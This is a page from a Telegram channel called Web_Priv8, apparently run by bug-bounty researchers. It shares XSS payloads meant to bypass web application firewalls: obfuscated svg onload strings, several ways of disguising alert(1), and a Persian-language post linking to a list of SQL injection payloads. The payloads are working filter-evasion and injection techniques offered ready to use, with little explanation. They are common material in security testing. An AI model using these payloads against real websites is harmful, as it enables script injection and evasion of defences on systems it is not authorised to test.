Web_Priv8
821 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
Payload XSS for WAF bypass

<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">

<svg onload=&#97&#108&#101&#114&#116(1)>

#XSS
#Payload
#OBF
#WAF
#Bypass

@web_priv8
alert Obfuscation for XSS

(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)

#XSS
#Payload
#OBF
#WAF
#Bypass

@web_priv8
اگه میخواید لیستی از انواع تکنینک های تزریق SQL ، ابزار ها ، پیلود ها و درآخر منابعی برای یادگیری داشته باشید لینک زیر کمکتون میکنه.

https://medium.com/@ismailtasdelen/sql-injection-payload-list-b97656cfd66b

#SQLi
#Payload

@web_priv8